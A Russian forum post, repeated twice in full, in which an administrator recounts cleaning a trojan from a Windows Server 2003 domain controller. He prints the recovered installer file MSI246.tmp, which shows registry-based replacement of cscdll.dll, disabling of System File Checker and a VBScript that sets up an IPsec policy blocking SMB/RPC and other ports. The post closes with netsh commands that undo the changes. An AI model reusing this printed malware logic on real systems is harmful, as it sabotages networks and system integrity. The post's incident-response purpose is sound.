Как открыть порты в Windows Server 2003 - Компьютерный форум OSzone.net

Добрый день!
В продолжение темы, но как я предполагаю моя информация пригодится не только обладателям серверной ОС.

Дело было на прошлой неделе.
Сначала перестала работать FileZilla Client - при подключении к удалённому серверу проходит обработка имя в адрес сервера и дальше ожидаем подключения (т.е. слушает порт 23) а там тишина. Превышено время ожидания ответа.
Я обратился к хостингу, они ответили что всё нормально проверьте телнетом, проверяю - не работает, проверяю с соседнего компа - работает ( :sorry: , хмм). Ну, думаю, ладно, пусть с этого по сети файлзиле поставлю ссылку на локальные файлы... ага не тут-то было, компьютера в сети не видно. :o
А это не просто компьютер это сервак АД, DHCP, DNS, Dr. Web сервер...
Вот было удивление когда работало всё, и др. веб обновлялся и в ДНС записи вносились, и динамические IP выдавались, сам на сервере сижу через RDP, но вот только сетевое окружение работало только на сервере через раз нормально, остальные ПК в сети не видели 90% времени ни домена ни политики обновить не могли (долго грузились утром при вкл.).
Стал вспоминать, а да точно было какое-то срабатывание на вирусы. Начал искать... в карантине др. вэба лежали trojan.packed2.42046 был найден в файле c:\windows\winupdate32.log
больше ничего, прошел kvrt, обнаружены: HEUR:Trojan.Script.Generic , not-a-virus:HEUR:AdWare.Script.Generic , not-a-virus:HEUR:AdWare.Win32.DealPly.gen и HEUR:Trojan.Win32.Generic (молодец), всё удалил перезагрузка с лечением.

Всё супер вирусов нет, но вот только проблемы остались (когда антивирусники будут возвращать в рабочее состояние изменённые вирусами файлы*****).

Стало понятно, что заблокированы порты. И при открытии файлов (заметил на архивах) стала вылезать надпись " cscdll.dll не найден ".

Дальше следовали 3 дня по поисковикам что да как пробовал разное что есть на форумах:
cscdll.dll нашёл на своём же ПК он был в C:\WINDOWS\ServicePackFiles\i386 и в C:\WINDOWS\system32\dllcache , но его не было в C:\WINDOWS\system32 тупо скопировал и перезагрузился, сообщение о ненайденом cscdll пропало.
Но что же с портами... подумал может троян таки какой-нибудь остался, часто встречал - один вирус приводит приятеля, а тот приводит своего... короче дискотека у них в моём компьютере.
Установил Malwarebytes Anti-Malware проверил, он мне вирусов насобирал и всё удалил, даже в реестре (молодец вообще).
Порты так и остались закрытыми. ОК, начал копать брандмауэр. В службах включил, а в настройках сделал сброс по умолчанию. Не помогло добавил правила для FTP на 21, 22 и 23 поты для TCP и UDP - результат 0.
Параллельно нашёл на сервере папке FONDQXIMSYHLISNDBCFPGGQDFFXNKBARIRJH видать последствия заражения.
Отключал\включал балансировку нагрузки сети, в настройках TCP включал NetBIOS помогало на минуты - компьютеры стали видеть сеть, но не сервак. На сервер нельзя было зайти из сети и шары его соответственно.
Полазил в маршрутизации и удалённом доступе - перестал запускаться брандмауэр, отключил маршрутизацию и удалённый доступ (в оснастке) - брандмауэр заработал, но не помогло.
Заметил в свойствах подключения имеется протокол TCP версия 6, удалил, перезагрузился - не помогло, установил обратно протокол.
Пробовал даже kidokiller - неа...
Пытался узнать что делает найденный троян HEUR:AdWare.Win32.DealPly.gen - нигде ничего.
Поставил PortScan там видно что порты открытые есть, но блин.... ну точно же порты не открытые, telnet показывает что 21 порт закрыт... чем не понятно, ну точно не брандмауэр....
Пробовал удалять сетевое подключение - неа.
Пробовал чинить винсокс программой winsockfix - неа, не оно.
Сегодня подумал надо поискать время заражения и посмотреть что осталось от вирусов. Время нашёл, а вот что осталось от вирусов найти... (молодцы антивирусники - хорошо жахнули).
Сделал поиск и увидел что папка C:\Program Files\FONDQXIMSYHLISNDBCFPGGQDFFXNKBARIRJH была создана 25 ноября в 11:14, после поиска на диске С всего по дате и упорядочивание по времени дали результат:
нашёл файл MSI246.tmp Открыл его блокнотом и вуаля - всё что делал вирус написано почти членораздельно, ну по крайней мере прочитать можно, что и как изменял вирус в системе.

Содержимое файла MSI246.tmp
@IXOS @- @НYyO @ @ @ @ @ @ & {80395032-1630-4C4B-A997-0A7CCB72C75B}$ FONDQXIMSYHLISNDBCFPGGQDFFXNKBARIRJH SMB2.jpg @ @ @ @ Ђ Ђ& {54900365-375C-422E-B1C5-97195DCA50E3} Ђ Ђ @ @ @ @ @ @Ё @ $ FONDQXIMSYHLISNDBCFPGGQDFFXNKBARIRJH Ђ RollbackАck(WЮVЪnНd\O: Ђ RollbackCleanupАck(W Rd–YэN‡eцN. . . А‡eцN: [ 1 ] „ @ „ @ ProcessComponentsАck(Wфf°eД~цNиlЊQh€. . . @ @ @А] & {AA00B7B4-1374-462E-A7CA-5140E25A78C3} C:\WINDOWS\AppPatch\Custom\ @ Ђ @ @ @
CreateFolders
Аck(WRъ^‡eцN9Y. . . А‡eцN9Y: [ 1 ] "[ C:\Program Files\FONDQXIMSYHLISNDBCFPGGQDFFXNKBARIRJH\FONDQXIMSYHLISNDBCFPGGQDFFXNKBARIRJH\ @ " C:\WINDOWS\AppPatch\Custom\ @ InstallFiles
Аck(W
Y6R°e‡eцN. . . А‡eцN: [ 1 ] 0 оvU_: [ 9 ] 0 'Y\: [ 6 ] @± @ @ C:\WINDOWS\ 1\WINDOW~1\|WindowsFolder\ ЂАч‹ТceQБxШv: disk1.cab @ Ђ @ C:\WINDOWS\Installer\MSI241.tmp Ђ Ђ Ђ Ђ @ SYSUPD~1.LOG|sysupdate.log
sysupdate.log
sysupdate.log @ @Пя @ Ђ Ђ @ Ђ Ђ Ђ Ђ @ Ђ Ђ @ „ WINUPD~1.LOG|winupdate32.log winupdate32.log winupdate32.log @ @O* @ Ђ Ђ @ Ђ Ђ Ђ Ђ @ Ђ Ђ @ „‡ j @ WriteRegistryValues
Аck(W™QeQы|Я~иlЊQh€<P. . . А.•<P: [ 1 ] я
Tрy: [ 2 ] я<P: [ 3 ] @ @ @ђ3 $ @ Ђ0 SYSTEM\CurrentControlSet\Control\Session Manager Ђ @ % AllowProtectedRenames #1% PendingFileRenameOperations=\??\C:\WINDOWS\AppPatch\Acpcscdll.dll \??\C:\WINDOWS\system32\cscdll.dll \??\C:\WINDOWS\AppPatch\Acpcscdll.dll \??\C:\WINDOWS\system32\cscdll.dll \??\C:\WINDOWS\winupdate32.log \??\C:\WINDOWS\system32\cscdll.dll \??\C:\WINDOWS\AppPatch\Ke583427.xsl \??\C:\WINDOWS\sysupdate.log \??\C:\WINDOWS\AppPatch\Ke583427.xsl$ @ Ђ5 SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Ђ @ %
SFCDisable #4% SFCScan #0$ @ Ђ SOFTWARE\SoundResearch Ђ @ % UpdaterLastTimeChecked1 #1 ExecuteScriptCode Ђ ЂJ ExecuteScriptCode @f Ќ
On Error Resume Next
Set vbs=CreateObject("Wscript.Shell")
vbs.Run "netsh interface ipv6 install",0,True
vbs.Run "netsh ipsec static add policy name=qianye",0,True
vbs.Run "netsh ipsec static add filterlist name=Filter1",0,True
vbs.Run "netsh ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=445 protocol=TCP",0,True
vbs.Run "netsh ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=135 protocol=TCP",0,True
vbs.Run "netsh ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=139 protocol=TCP",0,True
vbs.Run "netsh ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=445 protocol=UDP",0,True
vbs.Run "netsh ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=135 protocol=UDP",0,True
vbs.Run "netsh ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=139 protocol=UDP",0,True
vbs.Run "netsh ipsec static add filter filterlist=Filter1 srcaddr=Me dstaddr=any dstport=21 protocol=TCP",0,True
vbs.Run "netsh ipsec static add filter filterlist=Filter1 srcaddr=Me dstaddr=any dstport=2222 protocol=TCP",0,True
vbs.Run "netsh ipsec static add filter filterlist=Filter1 srcaddr=Me dstaddr=any dstport=3333 protocol=TCP",0,True
vbs.Run "netsh ipsec static add filter filterlist=Filter1 srcaddr=Me dstaddr=any dstport=4444 protocol=TCP",0,True
vbs.Run "netsh ipsec static add filter filterlist=Filter1 srcaddr=Me dstaddr=any dstport=5555 protocol=TCP",0,True
vbs.Run "netsh ipsec static add filter filterlist=Filter1 srcaddr=Me dstaddr=any dstport=6666 protocol=TCP",0,True
vbs.Run "netsh ipsec static add filter filterlist=Filter1 srcaddr=Me dstaddr=any dstport=7777 protocol=TCP",0,True
vbs.Run "netsh ipsec static add filter filterlist=Filter1 srcaddr=Me dstaddr=any dstport=8443 protocol=TCP",0,True
vbs.Run "netsh ipsec static add filter filterlist=Filter1 srcaddr=Me dstaddr=any dstport=8888 protocol=TCP",0,True
vbs.Run "netsh ipsec static add filter filterlist=Filter1 srcaddr=Me dstaddr=any dstport=9000 protocol=TCP",0,True
vbs.Run "netsh ipsec static add filter filterlist=Filter1 srcaddr=Me dstaddr=any dstport=9999 protocol=TCP",0,True
vbs.Run "netsh ipsec static add filter filterlist=Filter1 srcaddr=Me dstaddr=any dstport=14443 protocol=TCP",0,True
vbs.Run "netsh ipsec static add filter filterlist=Filter1 srcaddr=Me dstaddr=any dstport=14444 protocol=TCP",0,True
vbs.Run "netsh ipsec static add filteraction name=FilteraAtion1 action=block",0,True
vbs.Run "netsh ipsec static add rule name=Rule1 policy=qianye filterlist=Filter1 filteraction=FilteraAtion1",0,True
vbs.Run "netsh ipsec static set policy name=qianye assign=y",0,True @ @ @®qІ

Эта гадость подменила через реестр системные файлы, установила ТСР в. 6, и добавила правило с блокировкой портов.
Короче лечится так:

1. в командной строке вводим
netsh interface ipv6 uninstall

либо просто удалить протокол в настройках подключения

2. перезагрузка

3. в командной строке вводим
netsh ipsec static delete all

P.S. неделя выноса мозга, а всего две команды надо.

Добрый день!
В продолжение темы, но как я предполагаю моя информация пригодится не только обладателям серверной ОС.

Дело было на прошлой неделе.
Сначала перестала работать FileZilla Client - при подключении к удалённому серверу проходит обработка имя в адрес сервера и дальше ожидаем подключения (т.е. слушает порт 23) а там тишина. Превышено время ожидания ответа.
Я обратился к хостингу, они ответили что всё нормально проверьте телнетом, проверяю - не работает, проверяю с соседнего компа - работает ( :sorry: , хмм). Ну, думаю, ладно, пусть с этого по сети файлзиле поставлю ссылку на локальные файлы... ага не тут-то было, компьютера в сети не видно. :o
А это не просто компьютер это сервак АД, DHCP, DNS, Dr. Web сервер...
Вот было удивление когда работало всё, и др. веб обновлялся и в ДНС записи вносились, и динамические IP выдавались, сам на сервере сижу через RDP, но вот только сетевое окружение работало только на сервере через раз нормально, остальные ПК в сети не видели 90% времени ни домена ни политики обновить не могли (долго грузились утром при вкл.).
Стал вспоминать, а да точно было какое-то срабатывание на вирусы. Начал искать... в карантине др. вэба лежали trojan.packed2.42046 был найден в файле c:\windows\winupdate32.log
больше ничего, прошел kvrt, обнаружены: HEUR:Trojan.Script.Generic , not-a-virus:HEUR:AdWare.Script.Generic , not-a-virus:HEUR:AdWare.Win32.DealPly.gen и HEUR:Trojan.Win32.Generic (молодец), всё удалил перезагрузка с лечением.

Всё супер вирусов нет, но вот только проблемы остались (когда антивирусники будут возвращать в рабочее состояние изменённые вирусами файлы*****).

Стало понятно, что заблокированы порты. И при открытии файлов (заметил на архивах) стала вылезать надпись " cscdll.dll не найден ".

Дальше следовали 3 дня по поисковикам что да как пробовал разное что есть на форумах:
cscdll.dll нашёл на своём же ПК он был в C:\WINDOWS\ServicePackFiles\i386 и в C:\WINDOWS\system32\dllcache , но его не было в C:\WINDOWS\system32 тупо скопировал и перезагрузился, сообщение о ненайденом cscdll пропало.
Но что же с портами... подумал может троян таки какой-нибудь остался, часто встречал - один вирус приводит приятеля, а тот приводит своего... короче дискотека у них в моём компьютере.
Установил Malwarebytes Anti-Malware проверил, он мне вирусов насобирал и всё удалил, даже в реестре (молодец вообще).
Порты так и остались закрытыми. ОК, начал копать брандмауэр. В службах включил, а в настройках сделал сброс по умолчанию. Не помогло добавил правила для FTP на 21, 22 и 23 поты для TCP и UDP - результат 0.
Параллельно нашёл на сервере папке FONDQXIMSYHLISNDBCFPGGQDFFXNKBARIRJH видать последствия заражения.
Отключал\включал балансировку нагрузки сети, в настройках TCP включал NetBIOS помогало на минуты - компьютеры стали видеть сеть, но не сервак. На сервер нельзя было зайти из сети и шары его соответственно.
Полазил в маршрутизации и удалённом доступе - перестал запускаться брандмауэр, отключил маршрутизацию и удалённый доступ (в оснастке) - брандмауэр заработал, но не помогло.
Заметил в свойствах подключения имеется протокол TCP версия 6, удалил, перезагрузился - не помогло, установил обратно протокол.
Пробовал даже kidokiller - неа...
Пытался узнать что делает найденный троян HEUR:AdWare.Win32.DealPly.gen - нигде ничего.
Поставил PortScan там видно что порты открытые есть, но блин.... ну точно же порты не открытые, telnet показывает что 21 порт закрыт... чем не понятно, ну точно не брандмауэр....
Пробовал удалять сетевое подключение - неа.
Пробовал чинить винсокс программой winsockfix - неа, не оно.
Сегодня подумал надо поискать время заражения и посмотреть что осталось от вирусов. Время нашёл, а вот что осталось от вирусов найти... (молодцы антивирусники - хорошо жахнули).
Сделал поиск и увидел что папка C:\Program Files\FONDQXIMSYHLISNDBCFPGGQDFFXNKBARIRJH была создана 25 ноября в 11:14, после поиска на диске С всего по дате и упорядочивание по времени дали результат:
нашёл файл MSI246.tmp Открыл его блокнотом и вуаля - всё что делал вирус написано почти членораздельно, ну по крайней мере прочитать можно, что и как изменял вирус в системе.

Содержимое файла MSI246.tmp
@IXOS @- @НYyO @ @ @ @ @ @ & {80395032-1630-4C4B-A997-0A7CCB72C75B}$ FONDQXIMSYHLISNDBCFPGGQDFFXNKBARIRJH SMB2.jpg @ @ @ @ Ђ Ђ& {54900365-375C-422E-B1C5-97195DCA50E3} Ђ Ђ @ @ @ @ @ @Ё @ $ FONDQXIMSYHLISNDBCFPGGQDFFXNKBARIRJH Ђ RollbackАck(WЮVЪnНd\O: Ђ RollbackCleanupАck(W Rd–YэN‡eцN. . . А‡eцN: [ 1 ] „ @ „ @ ProcessComponentsАck(Wфf°eД~цNиlЊQh€. . . @ @ @А] & {AA00B7B4-1374-462E-A7CA-5140E25A78C3} C:\WINDOWS\AppPatch\Custom\ @ Ђ @ @ @
CreateFolders
Аck(WRъ^‡eцN9Y. . . А‡eцN9Y: [ 1 ] "[ C:\Program Files\FONDQXIMSYHLISNDBCFPGGQDFFXNKBARIRJH\FONDQXIMSYHLISNDBCFPGGQDFFXNKBARIRJH\ @ " C:\WINDOWS\AppPatch\Custom\ @ InstallFiles
Аck(W
Y6R°e‡eцN. . . А‡eцN: [ 1 ] 0 оvU_: [ 9 ] 0 'Y\: [ 6 ] @± @ @ C:\WINDOWS\ 1\WINDOW~1\|WindowsFolder\ ЂАч‹ТceQБxШv: disk1.cab @ Ђ @ C:\WINDOWS\Installer\MSI241.tmp Ђ Ђ Ђ Ђ @ SYSUPD~1.LOG|sysupdate.log
sysupdate.log
sysupdate.log @ @Пя @ Ђ Ђ @ Ђ Ђ Ђ Ђ @ Ђ Ђ @ „ WINUPD~1.LOG|winupdate32.log winupdate32.log winupdate32.log @ @O* @ Ђ Ђ @ Ђ Ђ Ђ Ђ @ Ђ Ђ @ „‡ j @ WriteRegistryValues
Аck(W™QeQы|Я~иlЊQh€<P. . . А.•<P: [ 1 ] я
Tрy: [ 2 ] я<P: [ 3 ] @ @ @ђ3 $ @ Ђ0 SYSTEM\CurrentControlSet\Control\Session Manager Ђ @ % AllowProtectedRenames #1% PendingFileRenameOperations=\??\C:\WINDOWS\AppPatch\Acpcscdll.dll \??\C:\WINDOWS\system32\cscdll.dll \??\C:\WINDOWS\AppPatch\Acpcscdll.dll \??\C:\WINDOWS\system32\cscdll.dll \??\C:\WINDOWS\winupdate32.log \??\C:\WINDOWS\system32\cscdll.dll \??\C:\WINDOWS\AppPatch\Ke583427.xsl \??\C:\WINDOWS\sysupdate.log \??\C:\WINDOWS\AppPatch\Ke583427.xsl$ @ Ђ5 SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Ђ @ %
SFCDisable #4% SFCScan #0$ @ Ђ SOFTWARE\SoundResearch Ђ @ % UpdaterLastTimeChecked1 #1 ExecuteScriptCode Ђ ЂJ ExecuteScriptCode @f Ќ
On Error Resume Next
Set vbs=CreateObject("Wscript.Shell")
vbs.Run "netsh interface ipv6 install",0,True
vbs.Run "netsh ipsec static add policy name=qianye",0,True
vbs.Run "netsh ipsec static add filterlist name=Filter1",0,True
vbs.Run "netsh ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=445 protocol=TCP",0,True
vbs.Run "netsh ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=135 protocol=TCP",0,True
vbs.Run "netsh ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=139 protocol=TCP",0,True
vbs.Run "netsh ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=445 protocol=UDP",0,True
vbs.Run "netsh ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=135 protocol=UDP",0,True
vbs.Run "netsh ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=139 protocol=UDP",0,True
vbs.Run "netsh ipsec static add filter filterlist=Filter1 srcaddr=Me dstaddr=any dstport=21 protocol=TCP",0,True
vbs.Run "netsh ipsec static add filter filterlist=Filter1 srcaddr=Me dstaddr=any dstport=2222 protocol=TCP",0,True
vbs.Run "netsh ipsec static add filter filterlist=Filter1 srcaddr=Me dstaddr=any dstport=3333 protocol=TCP",0,True
vbs.Run "netsh ipsec static add filter filterlist=Filter1 srcaddr=Me dstaddr=any dstport=4444 protocol=TCP",0,True
vbs.Run "netsh ipsec static add filter filterlist=Filter1 srcaddr=Me dstaddr=any dstport=5555 protocol=TCP",0,True
vbs.Run "netsh ipsec static add filter filterlist=Filter1 srcaddr=Me dstaddr=any dstport=6666 protocol=TCP",0,True
vbs.Run "netsh ipsec static add filter filterlist=Filter1 srcaddr=Me dstaddr=any dstport=7777 protocol=TCP",0,True
vbs.Run "netsh ipsec static add filter filterlist=Filter1 srcaddr=Me dstaddr=any dstport=8443 protocol=TCP",0,True
vbs.Run "netsh ipsec static add filter filterlist=Filter1 srcaddr=Me dstaddr=any dstport=8888 protocol=TCP",0,True
vbs.Run "netsh ipsec static add filter filterlist=Filter1 srcaddr=Me dstaddr=any dstport=9000 protocol=TCP",0,True
vbs.Run "netsh ipsec static add filter filterlist=Filter1 srcaddr=Me dstaddr=any dstport=9999 protocol=TCP",0,True
vbs.Run "netsh ipsec static add filter filterlist=Filter1 srcaddr=Me dstaddr=any dstport=14443 protocol=TCP",0,True
vbs.Run "netsh ipsec static add filter filterlist=Filter1 srcaddr=Me dstaddr=any dstport=14444 protocol=TCP",0,True
vbs.Run "netsh ipsec static add filteraction name=FilteraAtion1 action=block",0,True
vbs.Run "netsh ipsec static add rule name=Rule1 policy=qianye filterlist=Filter1 filteraction=FilteraAtion1",0,True
vbs.Run "netsh ipsec static set policy name=qianye assign=y",0,True @ @ @®qІ

Эта гадость подменила через реестр системные файлы, установила ТСР в. 6, и добавила правило с блокировкой портов.
Короче лечится так:

1. в командной строке вводим
netsh interface ipv6 uninstall

либо просто удалить протокол в настройках подключения

2. перезагрузка

3. в командной строке вводим
netsh ipsec static delete all

P.S. неделя выноса мозга, а всего две команды надо.